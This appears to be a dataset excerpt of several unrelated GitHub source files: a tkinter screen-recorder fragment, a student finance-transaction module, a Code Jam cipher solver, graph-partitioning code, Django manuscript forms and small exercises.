= Menu(menubar, tearoff=0)#C25993\n\n\nmp4_format = tkinter.BooleanVar()\nmp4_format.set(True)\navi_format = tkinter.BooleanVar()\n\nvideo.add_cascade(label='Video Format', menu=video_format)\n\nmenubar.add_cascade(label='File', menu=video)\nmenubar.add_cascade(label=\"About\", menu=about)\n\nstart_img = PhotoImage(file=f\"imp_images/start.png\")\nstart = Button(image=start_img, borderwidth=0, highlightthickness=0, relief=\"sunken\")\npause_img = PhotoImage(file=f\"imp_images/pause.png\")\npause = Button(image=pause_img, borderwidth=0, highlightthickness=0, relief=\"sunken\")\nend_img = PhotoImage(file=f\"imp_images/end.png\")\nend = Button(image=end_img, borderwidth=0, highlightthickness=0, relief=\"sunken\")\ninfo = canvas.create_text(400.0, 342.5, text=\"Start Recording\", fill=\"#0f0f0f\", font=(\"Roboto-Medium\", int(16.0)))\n\n# When started\n#start[\"state\"] = \"normal\"\nend[\"state\"] = \"normal\"\npause[\"state\"] = \"normal\"\n","repo_name":"Shubham-bit-hash/project-1-screen-recorder-python","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71357058114","text":"\"\"\"\r\n Program functionalities module\r\n\"\"\"\r\n\r\n\r\ndef creat_transaction(day, amount, typ, description):\r\n return [day, amount, typ, description]\r\n\r\n\r\ndef set_transaction(transactions, day, amount, typ, description):\r\n trans = creat_transaction(day, amount, typ, description)\r\n transactions. append(trans)\r\n\r\n\r\ndef auto_set_transaction(transactions):\r\n \"\"\"\r\n Setting 10 initial transactions in the list\r\n :param transactions:\r\n \"\"\"\r\n set_transaction(transactions, 1, 115, 'in', 'salary')\r\n set_transaction(transactions, 3, 16, 'out', 'food')\r\n set_transaction(transactions, 7, 8, 'in', 'economy')\r\n set_transaction(transactions, 10, 2, 'out', 'cat food')\r\n set_transaction(transactions, 16, 5, 'in', 'economy')\r\n set_transaction(transactions, 20, 21, 'in', 'food')\r\n set_transaction(transactions, 20, 10, 'out', 'party')\r\n set_transaction(transactions, 20, 8, 'out', 'vet')\r\n set_transaction(transactions, 20, 13, 'out', 'vet')\r\n set_transaction(transactions, 30, 115, 'in', 'salary')\r\n\r\n\r\ndef get_day(transactions, i):\r\n return transactions[i][0]\r\n\r\n\r\ndef get_value(transactions, i):\r\n return transactions[i][1]\r\n\r\n\r\ndef get_type(transactions, i):\r\n return transactions[i][2]\r\n\r\n\r\ndef get_description(transactions, i):\r\n return transactions[i][3]\r\n\r\n\r\ndef nr(aux):\r\n i = 0\r\n while i != len(aux) and aux[i] != ' ':\r\n if aux[i] < '0' or aux[i] > '9':\r\n return 0\r\n i = i + 1\r\n return 1\r\n\r\n\r\ndef option_error(option):\r\n y = option.split()\r\n error = 0\r\n if y[0] == 'add' or y[0] == 'insert':\r\n if y[0] == 'add' and len(y) != 4:\r\n error = 1\r\n elif y[0] == 'insert' and len(y) != 5:\r\n error = 1\r\n if error == 0:\r\n if nr(y[1]) == 0:\r\n error = 1\r\n elif y[0] == 'insert' and nr(y[2]) == 0:\r\n error = 1\r\n elif find_type(y[3]) == '-' and find_type(y[2]) == '-':\r\n error = 1\r\n elif y[0] == 'remove':\r\n if len(y) == 1:\r\n error = 1\r\n if error == 0:\r\n if len(y) == 4:\r\n if y[2] != 'to' or nr(y[3]) == 0:\r\n error = 1\r\n if nr(y[1]) == 0 and find_type(y[1]) == '-':\r\n error = 1\r\n elif y[0] == 'replace':\r\n if len(y) != 6:\r\n error = 1\r\n if error == 0:\r\n if nr(y[1]) == 0 or nr(y[5]) == 0:\r\n error = 1\r\n if find_type(y[2]) == '-':\r\n error = 1\r\n if y[4] != 'with':\r\n error = 1\r\n elif y[0] == 'list':\r\n if len(y) != 1:\r\n if len(y) == 2:\r\n if find_type(y[1]) == '-':\r\n error = 1\r\n elif len(y[1]) == 1:\r\n if y[1] != '=' and y[1] != '<' and y[1] != '>':\r\n error = 1\r\n if nr(y[2]) == 0:\r\n error = 1\r\n elif y[1] != 'balance' or nr(y[2]) == 0:\r\n error = 1\r\n elif y[0] == 'sum':\r\n if len(y) != 2:\r\n error = 1\r\n elif find_type(y[1]) == '-':\r\n error = 1\r\n elif y[0] == 'max' or y[0] == 'filter':\r\n if len(y) != 3:\r\n error = 1\r\n elif find_type(y[1]) == '-' or nr(y[2]) == 0:\r\n error = 1\r\n if y[0] == 'filter' and len(y) == 2 and find_type(y[1]) != '-':\r\n error = 0\r\n return error\r\n\r\n\r\ndef tests():\r\n assert elim_space(' ana are mere ') == 'ana are mere'\r\n assert creat_transaction(2, 3, 'in', 'pizza') == [2, 3, 'in', 'pizza']\r\n assert elim_cuv('text de 24') == 'de 24'\r\n assert take_word('text de 24') == 'text'\r\n assert elim_space(' text of 23 ') == 'text of 23'\r\n assert find_type('in mag') == 'in'\r\n t = [[2, 3, 'in', 'pizza'], [4, 3, 'in', 'pizza']]\r\n elim_transaction(t, 0)\r\n assert t == [[4, 3, 'in', 'pizza']]\r\n add_trans(t, 'insert 12 13 in pizza')\r\n assert t == [[4, 3, 'in', 'pizza'], [12, 13, 'in', 'pizza']]\r\n elim_trans_days(t, 4, 5)\r\n assert t == [[12, 13, 'in', 'pizza']]\r\n add_trans(t, 'insert 22 13 out pizza')\r\n elim_trans_type(t, 'out')\r\n assert t == [[12, 13, 'in', 'pizza']]\r\n add_trans(t, 'insert 22 13 out pizza')\r\n add_trans(t, 'add 5 in pizza')\r\n assert balance_day(t, 30) == 5\r\n assert sum_in(t, 'in') == 18\r\n add_trans(t, 'add 15 in pizza')\r\n assert maxi(t, 'in', 29) == 3\r\n filteri(t, 'filter in')\r\n assert t == [[12, 13, 'in', 'pizza'], [29, 5, 'in', 'pizza'], [29, 15, 'in', 'pizza']]\r\n op = ['add 5 in pizza']\r\n undo_add(op, t)\r\n assert t == [[12, 13, 'in', 'pizza'], [29, 15, 'in', 'pizza']]\r\n\r\n\r\ndef elim_cuv(list):\r\n \"\"\"\r\n The program eliminates the first word from the text\r\n :param list: the text\r\n :return: the text without the first word\r\n \"\"\"\r\n spatiu = 0\r\n i = 0\r\n while spatiu != 1:\r\n if list[i] == ' ':\r\n spatiu = spatiu + 1\r\n i = i + 1\r\n list = list[i:]\r\n return list\r\n\r\n\r\ndef take_word(list):\r\n \"\"\"\r\n the function returns the description of the transaction\r\n :param list: the text\r\n :return: the description\r\n \"\"\"\r\n i = 0\r\n n = len(list)\r\n while i < n and list[i] != ' ':\r\n i = i + 1\r\n list = list[:i]\r\n return list\r\n\r\n\r\ndef elim_space(text):\r\n \"\"\"\r\n the function eliminates the unnecessary spaces of the option\r\n \"\"\"\r\n while text[0] == ' ':\r\n text = text[1:]\r\n i = 1\r\n n = len(text)\r\n while i < n:\r\n if text[i] == ' ' and text[i-1] == ' ':\r\n c = text[0:i]\r\n b = text[i+1:]\r\n text = c + b\r\n n = n - 1\r\n else:\r\n i = i + 1\r\n if text[-1] == ' ':\r\n text = text[:-1]\r\n return text\r\n\r\n\r\ndef insert(transactions, i):\r\n \"\"\"\r\n The function is used for inserting transactions, so when we display the transactions they are ordered considering\r\n the 'day' as the main criteria.\r\n \"\"\"\r\n day = get_day(transactions, -1)\r\n j = -1\r\n if i < day:\r\n # we memorise the items of the last transaction\r\n value = get_value(transactions, -1)\r\n typ = get_type(transactions, -1)\r\n desc = get_description(transactions, -1)\r\n set_transaction(transactions, day, value, typ, desc)\r\n while i < day:\r\n transactions[j] = transactions[j-1]\r\n j = j - 1\r\n day = get_day(transactions, j)\r\n else:\r\n set_transaction(transactions, 0, 0, '0', '0')\r\n return -1\r\n return j + 1\r\n\r\n\r\ndef find_type(list):\r\n \"\"\"\r\n the function returns the type of the transaction if there is one\r\n :param list: the text\r\n :return: type\r\n \"\"\"\r\n cuv = take_word(list)\r\n if cuv == 'out':\r\n t = 'out'\r\n elif cuv == 'in':\r\n t = 'in'\r\n else:\r\n t = '-'\r\n return t\r\n\r\n\r\ndef add_trans(transactions, option):\r\n \"\"\"\r\n the function adds a new transaction according to the text that was read. it also separates the parts of the text\r\n that are crucial to understanding the transaction.\r\n :param transactions: the transactions that already exist\r\n :param option: the text inputted\r\n \"\"\"\r\n y = option.split()\r\n if y[0] == 'add':\r\n day = 29\r\n value = int(y[1])\r\n typ = y[2]\r\n description = y[3]\r\n else:\r\n day = int(y[1])\r\n value = int(y[2])\r\n typ = y[3]\r\n description = y[4]\r\n poz = insert(transactions, day)\r\n transactions[poz] = creat_transaction(day, value, typ, description)\r\n\r\n\r\ndef elim_transaction(transactions, index):\r\n \"\"\"the function eliminates the transaction with index == index\"\"\"\r\n del transactions[index]\r\n\r\n\r\ndef elim_trans_days(transactions, day1, day2):\r\n \"\"\"\r\n the function eliminates the transactions between the inputted days\r\n :param transactions: the transactions\r\n :param day1: the first day\r\n :param day2: the last day\r\n \"\"\"\r\n n = len(transactions)\r\n elim = 0\r\n i = 0\r\n while i < n-elim:\r\n day = get_day(transactions, i)\r\n if day1 <= day <= day2:\r\n elim_transaction(transactions, i)\r\n elim = elim + 1\r\n else:\r\n i = i + 1\r\n\r\n\r\ndef elim_trans_type(transactions, typ):\r\n \"\"\"\r\n the function eliminates the transactions that have the same type as the one inputted\r\n :param transactions: the transactions\r\n :param typ: the inputted type\r\n \"\"\"\r\n n = len(transactions)\r\n elim = 0\r\n i = 0\r\n while i < n - elim:\r\n ty = get_type(transactions, i)\r\n if ty == typ:\r\n elim_transaction(transactions, i)\r\n elim = elim + 1\r\n else:\r\n i = i + 1\r\n\r\n\r\ndef replace(transactions, day, typ, description, value):\r\n \"\"\"\r\n the function replaces the transactions that meet the requirements inputted\r\n :param transactions: the transactions\r\n :param day: the inputted day\r\n :param typ: the inputted type\r\n :param description: the inputted description\r\n :param value: the value with which the transaction is goind to be replaced\r\n \"\"\"\r\n n = len(transactions)\r\n i = 0\r\n while i < n:\r\n dy = get_day(transactions, i)\r\n ty = get_type(transactions, i)\r\n desc = get_description(transactions, i)\r\n if dy == day and ty == typ and desc == description:\r\n transactions[i][1] = value\r\n i = i + 1\r\n\r\n\r\ndef modify(transactions, option):\r\n \"\"\"\r\n the function is the main body for the second option\r\n :param transactions: the transactions\r\n :param option: the text\r\n \"\"\"\r\n y = option.split()\r\n if y[0] == 'remove':\r\n day1 = nr(y[1])\r\n if day1 != 0:\r\n day1 = int(y[1])\r\n if len(y) > 2:\r\n day2 = int(y[3])\r\n else:\r\n day2 = day1\r\n elim_trans_days(transactions, day1, day2)\r\n else:\r\n typ = y[1]\r\n elim_trans_type(transactions, typ)\r\n elif y[0] == 'replace':\r\n day = int(y[1])\r\n typ = y[2]\r\n desc = y[3]\r\n value = int(y[5])\r\n replace(transactions, day, typ, desc, value)\r\n\r\n\r\ndef balance_day(transactions, day):\r\n \"\"\"\r\n the function calculates the amount of money spent and saved till an inputted day\r\n :param transactions: the transactions\r\n :param day: the given day\r\n \"\"\"\r\n n = len(transactions)\r\n sum = 0\r\n i = 0\r\n while i < n:\r\n dy = get_day(transactions, i)\r\n if dy <= day:\r\n typ = get_type(transactions, i)\r\n if typ == 'in':\r\n sum = sum + get_value(transactions, i)\r\n else:\r\n sum = sum - get_value(transactions, i)\r\n i = i + 1\r\n return sum\r\n\r\n\r\ndef sum_in(transactions, typ):\r\n \"\"\"\r\n the function calculates the amount of money spent and saved till an inputted day\r\n :param transactions: the transactions\r\n \"\"\"\r\n n = len(transactions)\r\n sum = 0\r\n i = 0\r\n while i < n:\r\n type1 = get_type(transactions, i)\r\n if typ == type1:\r\n sum = sum + get_value(transactions, i)\r\n i = i + 1\r\n return sum\r\n\r\n\r\ndef maxi(transactions, typ, day):\r\n \"\"\"\r\n the function determines the maximum transaction that meets the requirements\r\n :param transactions: the transactions\r\n :param typ: the type\r\n :param day: the day\r\n :return: the position of the transaction\r\n \"\"\"\r\n poz = -1\r\n n = len(transactions)\r\n max = 0\r\n for i in range(0, n):\r\n if get_day(transactions, i) == day:\r\n if get_type(transactions,i) == typ:\r\n v = get_value(transactions, i)\r\n if max < v:\r\n max = v\r\n poz = i\r\n return poz\r\n\r\n\r\ndef filteri(transactions, option):\r\n \"\"\"\r\n the program filters the transactions\r\n :param transactions: the transactions\r\n :param option: the option\r\n \"\"\"\r\n y = option.split()\r\n n = len(transactions)\r\n i = 0\r\n while i < n:\r\n if len(y) == 3:\r\n if get_value(transactions, i) > int(y[2]):\r\n elim_transaction(transactions, i)\r\n n = n - 1\r\n else:\r\n i = i + 1\r\n else:\r\n if get_type(transactions, i) != y[1]:\r\n elim_transaction(transactions, i)\r\n n = n - 1\r\n else:\r\n i = i + 1\r\n\r\n\r\ndef undo_add(options, transactions):\r\n \"\"\"\r\n the function undo the adding operations\r\n \"\"\"\r\n y = options[-1].split()\r\n if y[0] == 'add':\r\n day = 29\r\n value = int(y[1])\r\n typ = y[2]\r\n desc = y[3]\r\n else:\r\n day = int(y[1])\r\n value = int(y[2])\r\n typ = y[3]\r\n desc = y[4]\r\n n = len(transactions)\r\n i = 0\r\n while i < n:\r\n if get_day(transactions, i) == int(day):\r\n if get_value(transactions, i) == value:\r\n if get_type(transactions, i) == typ and get_description(transactions, i) == desc:\r\n elim_transaction(transactions, i)\r\n break\r\n i = i + 1\r\n return transactions\r\n\r\n\r\ndef undo(options, transactions, eliminate):\r\n \"\"\"\r\n the function is the main body for the undo operation\r\n :param options: the option\r\n :param transactions: the transactions\r\n :param eliminate: the modified lists\r\n \"\"\"\r\n if len(options) == 0:\r\n print('there are no more options to undo')\r\n else:\r\n y = options[-1].split()\r\n if y[0] == 'add' or y[0] == 'insert':\r\n transactions = undo_add(options, transactions)\r\n elif y[0] == 'remove' or y[0] == 'replace' or y[0] == 'filter':\r\n transactions = eliminate[-1].copy()\r\n del eliminate[-1]\r\n del options[-1]\r\n return transactions\r\n","repo_name":"914-Claudia-Moisiuc/Faculty-Python","sub_path":"a4-914-Claudia-Moisiuc/src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":13818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12959880835","text":"import math\nimport statistics \n\ndef crack(nl, cipher):\n n,l = [int(i) for i in nl.split(\" \")]\n nums = map(lambda i: int(i), cipher.split(\" \"))\n all_prime_factors = set()\n options = []\n firstfactors = None\n i = 0\n for num in nums:\n factors = prime_factors(num)\n lfactors = list(factors)\n if firstfactors is None:\n firstfactors = lfactors\n if i > 0:\n if len(lfactors) == 1:\n # options = [lfactors]\n options[i-1] = lfactors\n else:\n options[i-1] += lfactors\n options.append(list(lfactors))\n i+=1\n all_prime_factors = all_prime_factors | factors\n options = [firstfactors] + options\n\n ## build alphabet\n ordered = list(all_prime_factors)\n ordered.sort()\n\n letter = ord('A')\n alphabet = {}\n for prime in ordered:\n alphabet[prime] = chr(letter)\n letter += 1\n\n while not_done(options):\n idx = -1\n\n for option in options:\n idx += 1\n if len(option) == 1:\n continue\n\n foundOne = False\n for o in option:\n unique = True\n if idx-1 >= 0:\n left = options[idx-1]\n if o in left:\n unique = False\n if idx+1 < len(options):\n right = options[idx+1]\n if o in right:\n unique = False\n if unique:\n options[idx] = [o]\n foundOne = True\n break\n if foundOne:\n continue\n\n try:\n m = statistics.mode(option)\n except statistics.StatisticsError:\n ## nothing to do\n continue\n\n if idx-1 >= 0:\n if m in options[idx-1] and len(options[idx-1]) > 1:\n options[idx-1].remove(m)\n\n if idx+1 < len(options):\n if m in options[idx+1] and len(options[idx+1]) > 1:\n options[idx+1].remove(m)\n\n options[idx] = [m]\n\n result = \"\"\n for num in options:\n result += alphabet[num[0]]\n return result\n\n\ndef not_done(options):\n for o in options:\n if len(o) > 1:\n return True\n return False\n\n\n# thanks https://www.geeksforgeeks.org/print-all-prime-factors-of-a-given-number/\ndef prime_factors(n):\n results = set()\n while n % 2 == 0: \n results.add(2)\n n = n / 2\n \n # n must be odd at this point \n # so a skip of 2 ( i = i + 2) can be used \n for i in range(3,int(math.sqrt(n))+1,2): \n while n % i== 0: \n results.add(i)\n n = int(n / i)\n \n # Condition if n is a prime \n # number greater than 2 \n if n > 2: \n results.add(int(n))\n\n return results\n\n\nif __name__ == \"__main__\":\n num_cases = int(input())\n case_num = 1\n while case_num <= num_cases:\n nl = input()\n cipher = input()\n clear = crack(nl, cipher)\n print(\"Case #{}: {}\".format(case_num, clear))\n case_num += 1","repo_name":"MustafaHaddara/google-code-jam-2019","sub_path":"qual/03-crypto.py","file_name":"03-crypto.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32599102907","text":"import torch\nfrom config import args\nfrom datasets.louvain.community import community_louvain\nfrom sklearn.cluster import spectral_clustering\n\n\ndef structure_iid_louvain(graph,num_clients):\n num_nodes = graph.number_of_nodes() \n partition = community_louvain.best_partition(graph)\n groups = []\n for key in partition.keys():\n if partition[key] not in groups:\n groups.append(partition[key])\n partition_groups = {group_i: [] for group_i in groups}\n for key in partition.keys():\n partition_groups[partition[key]].append(key)\n group_len_max = num_nodes // num_clients\n for group_i in groups:\n while len(partition_groups[group_i]) > group_len_max:\n long_group = list.copy(partition_groups[group_i])\n partition_groups[group_i] = list.copy(long_group[:group_len_max])\n new_grp_i = max(groups) + 1\n groups.append(new_grp_i)\n partition_groups[new_grp_i] = long_group[group_len_max:]\n len_list = []\n for group_i in groups:\n len_list.append(len(partition_groups[group_i]))\n len_dict = {}\n for i in range(len(groups)):\n len_dict[groups[i]] = len_list[i]\n sort_len_dict = {k: v for k, v in sorted(len_dict.items(), key=lambda item: item[1], reverse=True)}\n owner_node_ids = {owner_id: [] for owner_id in range(num_clients)}\n owner_nodes_len = num_nodes // num_clients\n owner_list = [i for i in range(num_clients)]\n owner_ind = 0\n for group_i in sort_len_dict.keys():\n while len(owner_node_ids[owner_list[owner_ind]]) > owner_nodes_len:\n owner_list.remove(owner_list[owner_ind])\n owner_ind = owner_ind % len(owner_list)\n k = 0\n while len(owner_node_ids[owner_list[owner_ind]]) + len(partition_groups[group_i]) > owner_nodes_len + 1:\n k += 1\n owner_ind = (owner_ind + 1) % len(owner_list)\n if k == len(owner_list):\n owner_node_ids[owner_list[owner_ind]] += partition_groups[group_i]\n break\n owner_node_ids[owner_list[owner_ind]] += partition_groups[group_i]\n node_dict = owner_node_ids\n return node_dict\n\ndef structure_iid_sc(num_nodes,F,num_clients):\n S = torch.sigmoid(torch.mm(F, F.T))\n S = S.cpu().detach().numpy()\n clustering_lbls = spectral_clustering(affinity=S, n_clusters=num_clients)\n clustering_lbls = clustering_lbls.tolist()\n node_dict = {client_id: [] for client_id in range(num_clients)}\n for node_idx in range(num_nodes):\n node_dict[clustering_lbls[node_idx]].append(node_idx)\n return node_dict","repo_name":"xkLi-Allen/AdaFGL","sub_path":"datasets/structure_iid.py","file_name":"structure_iid.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23476406371","text":"filename = \"A-large\"\n\ndef contains_all_dig(set):\n if (len(set) == 10):\n return True\n else:\n return False\n\n\nwith open(filename + \".in\", \"r\") as input:\n with open(filename + \".out.txt\", \"w\") as output:\n for case_num in range(1, int(input.readline()) + 1) :\n output.write(\"Case #{}: \".format(case_num))\n starting_N = int(input.readline())\n if starting_N == 0:\n output.write(\"INSOMNIA\\n\")\n else:\n N = starting_N\n digit_set = set()\n while (not contains_all_dig(digit_set)):\n for char in str(N):\n digit_set.add(char)\n N += starting_N\n output.write(\"{}\\n\".format(N - starting_N))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_177/1176.py","file_name":"1176.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32342708116","text":"import threading\nimport time\nimport psutil\nimport pandas as pd\n\n\ndef get_cpu_temp(date, time_list, queuee):\n while True:\n time.sleep(60)\n date.append(psutil.cpu_stats().ctx_switches)\n time_list.append(f\"{time.localtime().tm_hour}:{time.localtime().tm_min}:{time.localtime().tm_sec}\")\n queuee.append(\"Число переключений контекста\")\n\n\ndef memory(mem_date, time_list, queuee):\n while True:\n time.sleep(60)\n mem_date.append(psutil.virtual_memory().percent)\n time_list.append(f\"{time.localtime().tm_hour}:{time.localtime().tm_min}:{time.localtime().tm_sec}\")\n queuee.append(\"Процент использования памяти, проценты\")\n\n\ndef collecter(work_time: float):\n time_list = []\n\n date = []\n queuee = []\n t1 = threading.Thread(target=get_cpu_temp, args=(date, time_list, queuee,), daemon=True)\n t2 = threading.Thread(target=memory, args=(date, time_list, queuee,), daemon=True)\n\n t1.start()\n t2.start()\n\n delta = 0\n start_time = time.time()\n while (delta <= work_time):\n delta = time.time() - start_time\n\n t1.join(0.1)\n t2.join(0.1)\n\n print(time_list)\n print(queuee)\n print(date)\n\n table = pd.DataFrame({\"Время\": time_list, \"Процесс\": queuee, \"Данные\": date})\n table.to_csv(\"table.csv\", sep=\";\")\n\nif __name__ == '__main__':\n collecter(125)","repo_name":"Nastya31/new_git","sub_path":"threadss.py","file_name":"threadss.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20065663916","text":"print('PAR OU ÍMPAR')\n\ntotal = 0\npar = 0\nvalor = float(input('Digite um valor: '))\n\nwhile valor != 1000:\n if (valor % 2) == 0:\n print('Esse número é par!\\nDigite \"1000\" para encerrar!')\n par = par + 1\n total = total + 1\n else:\n print('Esse número é ímpar!\\nDigite \"1000\" para encerrar!')\n total = total + 1\n valor = float(input('Digite um valor: '))\n\nprint(f'O total de números digitados foi {total}\\nO total de números pares digitados foi {par}')\nprint('PROGRAMA ENCERRADO!')","repo_name":"FilipeHanniel/guppe","sub_path":"Exerc_sec_06/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17225949151","text":"# Given an integer array nums of length n and an integer target, find three integers in nums such that the sum is closest to target.\n\n# Return the sum of the three integers.\n\n# You may assume that each input would have exactly one solution.\n\n# Example 1:\n\n# Input: nums = [-1,2,1,-4], target = 1\n# Output: 2\n# Explanation: The sum that is closest to the target is 2. (-1 + 2 + 1 = 2).\n# Example 2:\n\n# Input: nums = [0,0,0], target = 1\n# Output: 0\n \n# Constraints:\n\n# 3 <= nums.length <= 1000\n# -1000 <= nums[i] <= 1000\n# -104 <= target <= 104\n\nclass Solution:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n min_diff = float('inf')\n min_sum = None\n n = len(nums)\n \n nums.sort()\n \n for i in range(n - 2):\n left_pointer = i + 1\n right_pointer = n - 1\n \n while left_pointer != right_pointer:\n current_sum = nums[i] + nums[left_pointer] + nums[right_pointer]\n # print(str(nums[i]) + ' ' + str(nums[left_pointer]) + ' ' + str(nums[right_pointer]))\n diff_target = abs(target - current_sum)\n # print(diff_target)\n if diff_target < min_diff:\n min_diff = diff_target\n min_sum = current_sum\n \n if current_sum < target:\n left_pointer += 1\n else:\n right_pointer -= 1\n \n return min_sum","repo_name":"angelricardoh/LeetCode-Python","sub_path":"Three Sum Closest.py","file_name":"Three Sum Closest.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38331952769","text":"from django import forms\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Submit, Row, Column, HTML\n\nfrom django.forms.models import inlineformset_factory\nfrom django_superform.forms import SuperModelFormMixin\nfrom django_superform import InlineFormSetField\n\nfrom language_tags import data as language_data\nregistry = language_data.get('registry')\n\nfrom django_select2 import forms as s2forms\n\nfrom . import models\n\n\nclass ModelFormWithInlineFormsetMixin(object):\n '''\n Allow nested forms to be automatically saved.\n\n If a form containing an InlineFormset is dynamically created on the\n client the forms in the formset will not have an id of their parent\n (because it doesn't have one yet). This means that we first need to save\n the parent form and only then the child form can be saved. However, by\n default, the forms first saves its children, and only then saves the\n parent. This is why this class has to be used to save children an\n additional time after the parent has been saved.\n\n Deleted forms should not be saved, since their instance would already be\n deleted by super().save().\n\n Taken from https://github.com/Chirurgus/cookbox\n '''\n\n def save(self, commit=True):\n '''\n (Re)saves the related formsets, so that newly created\n nested formsets are also saved.\n '''\n # Save the parent\n ret = super().save(commit)\n if hasattr(self, 'formsets'):\n for formset in self.formsets.values():\n for form in formset.forms:\n if not form in formset.deleted_forms:\n form.save(commit)\n return ret\n\n\nclass SuperModelForm( ModelFormWithInlineFormsetMixin, SuperModelFormMixin, forms.ModelForm ):\n pass\n\n\ndef submit_buttons():\n return Row( \n Submit(\"submit\", \"Save\"), \n HTML('Cancel'),\n )\n\n\nclass RepositoryForm(forms.ModelForm):\n class Meta:\n fields = \"__all__\"\n model = models.Repository\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n \"identifier\",\n \"url\",\n Row(Column(\"location_description\"), Column(\"settlement\"), css_class='form-row'),\n Row(Column(\"latitude\"), Column(\"longitude\"), css_class='form-row'),\n submit_buttons(),\n )\n\nlanguage_subtag_choices = sorted( \n [(language['Subtag'],language['Description'][0]) for language in filter(lambda x: x['Type'] == \"language\", registry) ],\n key=lambda x: x[1],\n)\n\n\n\nclass ChoiceWidget(s2forms.Select2Widget):\n def build_attrs(self, base_attrs, extra_attrs=None):\n base_attrs = super().build_attrs(base_attrs, extra_attrs)\n base_attrs.update(\n {\n \"data-minimum-input-length\": 0, \n \"data-placeholder\": self.empty_label,\n # \"data-theme\": \"bootstrap4\",\n }\n )\n return base_attrs\n\n @property\n def media(self):\n media = super().media\n \n js = [x if x != \"django_select2/django_select2.js\" else \"kutub/js/django_select2.js\" for x in list(media._js)]\n css = dict(media._css)\n css['screen'] += [\"https://cdn.jsdelivr.net/npm/@ttskch/select2-bootstrap4-theme/dist/select2-bootstrap4.min.css\"]\n return forms.Media(\n css=css,\n js=js,\n )\n\n\nclass LanguageForm(forms.ModelForm):\n class Meta:\n fields = \"__all__\"\n model = models.Language\n widgets = {\n \"language_subtag\": ChoiceWidget,\n \"extlang\": ChoiceWidget,\n \"script\": ChoiceWidget,\n \"region\": ChoiceWidget,\n }\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Row(Column(\"description\"), css_class='form-row'),\n Row(Column(\"language_subtag\"), Column(\"extlang\"), css_class='form-row'),\n Row(Column(\"script\"), Column(\"region\"), css_class='form-row'),\n submit_buttons(),\n )\n\n\nclass LanguageWidget(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n \"description__icontains\",\n ]\n\n def build_attrs(self, base_attrs, extra_attrs=None):\n base_attrs = super().build_attrs(base_attrs, extra_attrs)\n base_attrs.update(\n {\n \"data-minimum-input-length\": 0, \n \"data-placeholder\": self.empty_label,\n \"theme\": \"bootstrap4\",\n }\n )\n return base_attrs\n\n\nclass ContentItemForm(SuperModelForm):\n class Meta:\n model = models.ContentItem\n fields = \"__all__\"\n widgets = {\n \"other_languages\": LanguageWidget,\n }\n\n\nContentItemFormSet = inlineformset_factory(\n model=models.ContentItem,\n parent_model=models.Manuscript,\n form=ContentItemForm,\n extra=0,\n can_delete=True\n)\n\n\nclass ManuscriptForm(SuperModelForm):\n content_items = InlineFormSetField(formset_class=ContentItemFormSet)\n\n class Meta:\n fields = \"__all__\"\n model = models.Manuscript\n widgets = {\n \"other_languages\": LanguageWidget,\n }\n","repo_name":"rbturnbull/kutub","sub_path":"kutub/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74298522754","text":"#!/usr/bin/env python3\n\"\"\"Simple script to continuously feed pair source optimization statistics\n\nPython port of 'inst_efficiency.sh' functionality written in CQT.\nSupports reading of singles, pairs, and other miscellaneous features.\nInterface via CLI only, to avoid unnecessary GUI dependencies.\n\nSupports usage of 'inst_efficiency.py' both as a script,\nas well as an importable library for specific function usage, e.g. 'read_log'.\n\nConfiguration files can be supplied according to parser specification, which\ncan be viewed by supplying the '--help' flag.\n\nUsage:\n\n 1. View available configuration options\n\n ./inst_efficiency.py --help\n\n\n 2. TTL input pulses with 2s integration time\n\n ./inst_efficiency.py singles \\\n -U /dev/ioboards/usbtmst1 \\\n -S /home/sfifteen/programs/usbtmst4/apps/readevents7 \\\n --threshvolt 1 \\\n --integration_time 2\n\n\n 3. Search for pairs between detector channels 1 and 2, over +/-250ns,\n showing histogram of coincidences for each dataset\n\n ./inst_efficiency.py pairs -qH --channel_start 1 --channel_stop 2\n\n\n 4. Calculate total pairs located at +118ns delay, within a 2ns-wide\n coincidence window spanning +117ns to +118ns, with only 20 bins\n\n ./inst_efficiency.py pairs -q --peak 118 --left=-1 --right=0 --bins 20\n\n\n 5. Log measurements into a file\n\n ./inst_efficiency.py pairs -q --logging pair_measurements\n\n\n 6. Save configuration from (4) into default config file\n\n ./inst_efficiency.py pairs -q --peak 118 -L=-1 -R 0 --bins 20 \\\n --save ./inst_efficiency.py.default.conf\n\n\n 7. Load multiple configuration\n\n > cat ./inst_efficiency.py.default.conf\n bins = 10\n peak = 200\n\n > cat ./asympair\n peak = 118\n integration_time = 2\n\n # Output yields 'bins=10', 'peak=118', 'integration_time=3'\n ./inst_efficiency.py pairs -c asympair --time 3\n\n\nAuthor:\n Justin, 